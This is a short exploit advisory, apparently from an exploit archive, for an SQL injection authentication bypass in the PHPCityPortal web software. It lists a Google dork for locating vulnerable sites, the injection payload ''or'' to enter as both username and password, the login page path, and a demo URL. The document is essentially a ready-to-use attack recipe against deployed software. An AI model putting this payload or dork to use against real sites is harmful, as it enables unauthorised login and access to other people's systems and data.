PHPCityPortal suffers from a remote SQL injection vulnerability that allows for authentication bypass.
fb1e8c9fd8e8f5ab86eff066d189bab94f2a5ddd72929efc5669c830b370c125
******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Page: http://phpcityportal.com/
DOrk: intext:"Powered by PHPCityPortal.com"
******************************************************************************************
EXPLOIT
Username: 'or'
Password: 'or'
http://localhost/[path]/login.php
Demo: http://phpcityportal.com/demo/login.php
******************************************************************************************